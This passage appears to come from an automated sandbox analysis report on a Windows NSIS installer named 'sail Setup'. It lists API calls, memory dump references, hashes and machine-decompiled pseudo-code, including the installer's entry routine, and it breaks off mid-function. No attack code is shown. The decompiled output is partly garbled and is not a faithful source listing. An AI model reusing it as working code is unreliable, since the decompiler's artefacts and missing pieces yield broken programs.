                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                                                                          • LocalFree.KERNEL32(0063F8A0,00000000,00401922), ref: 0040B323
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0063F8A0,00000000,00401922), ref: 0040B342
                                                                                                                          • LocalFree.KERNEL32(006408A0,?,00000000,00008000,0063F8A0,00000000,00401922), ref: 0040B381
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040B3AA
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040B3B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                          				long _t11;
                                                                                                                          				void* _t16;
                                                                                                                          
                                                                                                                          				_t16 = __ebx;
                                                                                                                          				 *__edi =  *__edi + __ecx;
                                                                                                                          				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
                                                                                                                          				 *0x40900c = 2;
                                                                                                                          				 *0x40a010 = 0x401008;
                                                                                                                          				 *0x40a014 = 0x401010;
                                                                                                                          				 *0x40a036 = 2;
                                                                                                                          				 *0x40a000 = E00403960;
                                                                                                                          				if(E00402808() != 0) {
                                                                                                                          					_t3 = E00402838();
                                                                                                                          				}
                                                                                                                          				E004028FC(_t3);
                                                                                                                          				 *0x40a03c = 0xd7b0;
                                                                                                                          				 *0x40a208 = 0xd7b0;
                                                                                                                          				 *0x40a3d4 = 0xd7b0;
                                                                                                                          				 *0x40a02c = GetCommandLineA();
                                                                                                                          				 *0x40a028 = E00401098();
                                                                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                          					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                                                                          				} else {
                                                                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                          						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                                                                          					} else {
                                                                                                                          						 *0x40a5a8 = 3;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t11 = GetCurrentThreadId();
                                                                                                                          				 *0x40a020 = _t11;
                                                                                                                          				return _t11;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 0040280D
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 00402819
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734044017-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 65%
                                                                                                                          			E00402838() {
                                                                                                                          				void* _v8;
                                                                                                                          				char _v12;
                                                                                                                          				int _v16;
                                                                                                                          				signed short _t12;
                                                                                                                          				signed short _t14;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				intOrPtr _t32;
                                                                                                                          
                                                                                                                          				_t29 = _t31;
                                                                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                                                                          				_v12 =  *0x409018 & 0x0000ffff;
                                                                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                          					_t12 =  *0x409018; // 0x1332
                                                                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                          					 *0x409018 = _t14;
                                                                                                                          					return _t14;
                                                                                                                          				} else {
                                                                                                                          					_push(_t29);
                                                                                                                          					_push(E004028A9);
                                                                                                                          					_push( *[fs:eax]);
                                                                                                                          					 *[fs:eax] = _t32;
                                                                                                                          					_v16 = 4;
                                                                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                          					_pop(_t27);
                                                                                                                          					 *[fs:eax] = _t27;
                                                                                                                          					_push(0x4028b0);
                                                                                                                          					return RegCloseKey(_v8);
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
                                                                                                                          				void _v32;
                                                                                                                          				void* _v40;
                                                                                                                          				void* _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t20;
                                                                                                                          				struct _ICONINFO* _t23;
                                                                                                                          
                                                                                                                          				_t9 = __eax;
                                                                                                                          				_t20 = __eax;
                                                                                                                          				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
                                                                                                                          					E004064E4(__eax);
                                                                                                                          					_t9 = __edx;
                                                                                                                          					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
                                                                                                                          					if(__edx != 0) {
                                                                                                                          						GetIconInfo(__edx, _t23);
                                                                                                                          						GetObjectA(_v40, 0x18,  &_v32);
                                                                                                                          						 *(_t20 + 0x18) = _v40;
                                                                                                                          						_t17 = _v52;
                                                                                                                          						if(_t17 != 0) {
                                                                                                                          							DeleteObject(_t17);
                                                                                                                          						}
                                                                                                                          						_t9 = _v48;
                                                                                                                          						if(_t9 != 0) {
                                                                                                                          							return DeleteObject(_t9);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t9;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			_entry_() {
                                                                                                                          				struct _SHFILEINFOA _v360;
                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v376;
                                                                                                                          				char _v380;
                                                                                                                          				CHAR* _v384;
                                                                                                                          				char _v396;
                                                                                                                          				int _v400;
                                                                                                                          				int _v404;
                                                                                                                          				CHAR* _v408;
                                                                                                                          				intOrPtr _v412;
                                                                                                                          				int _v416;
                                                                                                                          				intOrPtr _v420;
                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v424;
                                                                                                                          				void* _v432;
                                                                                                                          				int _t34;
                                                                                                                          				CHAR* _t39;
                                                                                                                          				char* _t42;
                                                                                                                          				signed int _t44;
                                                                                                                          				void* _t48;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				signed int _t52;
                                                                                                                          				signed int _t55;
                                                                                                                          				int _t56;
                                                                                                                          				signed int _t60;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				intOrPtr _t77;
                                                                                                                          				void* _t79;
                                                                                                                          				void* _t89;
                                                                                                                          				void* _t91;
                                                                                                                          				char* _t96;
                                                                                                                          				signed int _t97;
                                                                                                                          				void* _t98;
                                                                                                                          				signed int _t99;
                                                                                                                          				signed int _t100;
                                                                                                                          				signed int _t103;
                                                                                                                          				CHAR* _t105;
                                                                                                                          				signed int _t106;
                                                                                                                          				intOrPtr _t113;
                                                                                                                          				char _t120;
                                                                                                                          
                                                                                                                          				_v376 = 0;
                                                                                                                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                          				_t99 = 0;
                                                                                                                          				_v380 = 0x20;
                                                                                                                          				__imp__#17();
                                                                                                                          				_t34 = SetErrorMode(0x8001); // executed
                                                                                                                          				__imp__OleInitialize(0); // executed
                                                                                                                          				 *0x423f38 = _t34;
                                                                                                                          				 *0x423e84 = E00405CFF(8);
                                                                                                                          				SHGetFileInfoA(0x41f430, 0,  &_v360, 0x160, 0); // executed
                                                                                                                          				E004059DD("sail Setup", "NSIS Error");
                                                                                                                          				_t39 = GetCommandLineA();
                                                                                                                          				_t96 = "\"C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe\" ";
                                                                                                                          				E004059DD(_t96, _t39);
                                                                                                                          				 *0x423e80 = GetModuleHandleA(0);
                                                                                                                          				_t42 = _t96;
                                                                                                                          				if("\"C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe\" " == 0x22) {
                                                                                                                          					_v404 = 0x22;
                                                                                                                          					_t42 =  &M00429001;
                                                                                                                          				}
                                                                                                                          				_t44 = CharNextA(E004054FB(_t42, _v404));
                                                                                                                          				_v404 = _t44;
                                                                                                                          				while(1) {
                                                                                                                          					_t91 =  *_t44;
                                                                                                                          					_t109 = _t91;
                                                                                                                          					if(_t91 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags = _t91 - 0x20;
                                                                                                                          					if(_t91 != 0x20) {
                                                                                                                          						L5:
                                                                                                                          						__eflags =  *_t44 - 0x22;
                                                                                                                          						_v404 = 0x20;
                                                                                                                          						if( *_t44 == 0x22) {
                                                                                                                          							_t44 = _t44 + 1;
                                                                                                                          							__eflags = _t44;
                                                                                                                          							_v404 = 0x22;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_t44 - 0x2f;
                                                                                                                          						if( *_t44 != 0x2f) {
                                                                                                                          							L15:
                                                                                                                          							_t44 = E004054FB(_t44, _v404);
                                                                                                                          							__eflags =  *_t44 - 0x22;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t44 = _t44 + 1;
                                                                                                                          								__eflags = _t44;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							_t44 = _t44 + 1;
                                                                                                                          							__eflags =  *_t44 - 0x53;
                                                                                                                          							if( *_t44 == 0x53) {
                                                                                                                          								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                                                                                          								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                                                                                          									_t99 = _t99 | 0x00000002;
                                                                                                                          									__eflags = _t99;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t44 - 0x4352434e;
                                                                                                                          							if( *_t44 == 0x4352434e) {
                                                                                                                          								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                                                                                          								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                                                                                          									_t99 = _t99 | 0x00000004;
                                                                                                                          									__eflags = _t99;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                                                                                          							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                                                                                          								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                                                                                          								_t45 = _t44 + 2;
                                                                                                                          								__eflags = _t44 + 2;
                                                                                                                          								E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t45);
                                                                                                                          								L20:
                                                                                                                          								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                                                          								GetTempPathA(0x400, _t105);
                                                                                                                          								_t48 = E00403097(_t109);
                                                                                                                          								_t110 = _t48;
                                                                                                                          								if(_t48 != 0) {
                                                                                                                          									L22:
                                                                                                                          									DeleteFileA("1033"); // executed
                                                                                                                          									_t50 = E00402C22(_t111, _t99); // executed
                                                                                                                          									_v412 = _t50;
                                                                                                                          									if(_t50 != 0) {
                                                                                                                          										L32:
                                                                                                                          										E0040344C();
                                                                                                                          										__imp__OleUninitialize();
                                                                                                                          										if(_v408 == 0) {
                                                                                                                          											__eflags =  *0x423f14; // 0x0
                                                                                                                          											if(__eflags != 0) {
                                                                                                                          												_t106 = E00405CFF(3);
                                                                                                                          												_t100 = E00405CFF(4);
                                                                                                                          												_t55 = E00405CFF(5);
                                                                                                                          												__eflags = _t106;
                                                                                                                          												_t97 = _t55;
                                                                                                                          												if(_t106 != 0) {
                                                                                                                          													__eflags = _t100;
                                                                                                                          													if(_t100 != 0) {
                                                                                                                          														__eflags = _t97;
                                                                                                                          														if(_t97 != 0) {
                                                                                                                          															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                                                                                                          															__eflags = _t60;
                                                                                                                          															if(_t60 != 0) {
                                                                                                                          																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                                                                                                          																_v416 = 1;
                                                                                                                          																_v404 = 2;
                                                                                                                          																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												_t56 = ExitWindowsEx(2, 0);
                                                                                                                          												__eflags = _t56;
                                                                                                                          												if(_t56 == 0) {
                                                                                                                          													E0040140B(9);
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											_t52 =  *0x423f2c; // 0xffffffff
                                                                                                                          											__eflags = _t52 - 0xffffffff;
                                                                                                                          											if(_t52 != 0xffffffff) {
                                                                                                                          												_v400 = _t52;
                                                                                                                          											}
                                                                                                                          											ExitProcess(_v400);
                                                                                                                          										}
                                                                                                                          										E0040529E(_v408, 0x200010);
                                                                                                                          										ExitProcess(2);
                                                                                                                          									}
                                                                                                                          									_t113 =  *0x423e9c; // 0x0
                                                                                                                          									if(_t113 == 0) {
                                                                                                                          										L31:
                                                                                                                          										 *0x423f2c =  *0x423f2c | 0xffffffff;
                                                                                                                          										_v400 = E00403526();
                                                                                                                          										goto L32;
                                                                                                                          									}
                                                                                                                          									_t103 = E004054FB(_t96, 0);
                                                                                                                          									while(_t103 >= _t96) {
                                                                                                                          										__eflags =  *_t103 - 0x3d3f5f20;
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t103 = _t103 - 1;
                                                                                                                          										__eflags = _t103;
                                                                                                                          									}
                                                                                                                          									_t115 = _t103 - _t96;
                                                                                                                          									_v408 = "Error launching installer";
                                                                                                                          									if(_t103 < _t96) {
                                                                                                                          										lstrcatA(_t105, "~nsu.tmp");
                                                                                                                          										_t101 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490";
                                                                                                                          										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490") == 0) {
                                                                                                                          											goto L32;
                                                                                                                          										}
                                                                                                                          										CreateDirectoryA(_t105, 0);
                                                                                                                          										SetCurrentDirectoryA(_t105);
                                                                                                                          										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                                                                                          										if(_t120 == 0) {
                                                                                                                          											E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t101);
                                                                                                                          										}
                                                                                                                          										E004059DD(0x424000, _v396);
                                                                                                                          										 *0x424400 = 0x41;
                                                                                                                          										_t98 = 0x1a;
                                                                                                                          										do {
                                                                                                                          											_t71 =  *0x423e90; // 0x4868b0
                                                                                                                          											E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)(_t71 + 0x120)));
                                                                                                                          											DeleteFileA(0x41f030);
                                                                                                                          											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe", 0x41f030, 1) != 0) {
                                                                                                                          												_push(0);
                                                                                                                          												_push(0x41f030);
                                                                                                                          												E0040572B();
                                                                                                                          												_t77 =  *0x423e90; // 0x4868b0
                                                                                                                          												E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)(_t77 + 0x124)));
                                                                                                                          												_t79 = E0040523D(0x41f030);
                                                                                                                          												if(_t79 != 0) {
                                                                                                                          													CloseHandle(_t79);
                                                                                                                          													_v416 = 0;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											 *0x424400 =  *0x424400 + 1;
                                                                                                                          											_t98 = _t98 - 1;
                                                                                                                          										} while (_t98 != 0);
                                                                                                                          										_push(0);
                                                                                                                          										_push(_t105);
                                                                                                                          										E0040572B();
                                                                                                                          										goto L32;
                                                                                                                          									}
                                                                                                                          									 *_t103 = 0;
                                                                                                                          									_t104 = _t103 + 4;
                                                                                                                          									if(E004055B1(_t115, _t103 + 4) == 0) {
                                                                                                                          										goto L32;
                                                                                                                          									}
                                                                                                                          									E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                                                                                                                          									E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                                                                                                                          									_v424 = 0;
                                                                                                                          									goto L31;
                                                                                                                          								}
                                                                                                                          								GetWindowsDirectoryA(_t105, 0x3fb);
                                                                                                                          								lstrcatA(_t105, "\\Temp");
                                                                                                                          								_t89 = E00403097(_t110);
                                                                                                                          								_t111 = _t89;
                                                                                                                          								if(_t89 == 0) {
                                                                                                                          									goto L32;
                                                                                                                          								}
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L4;
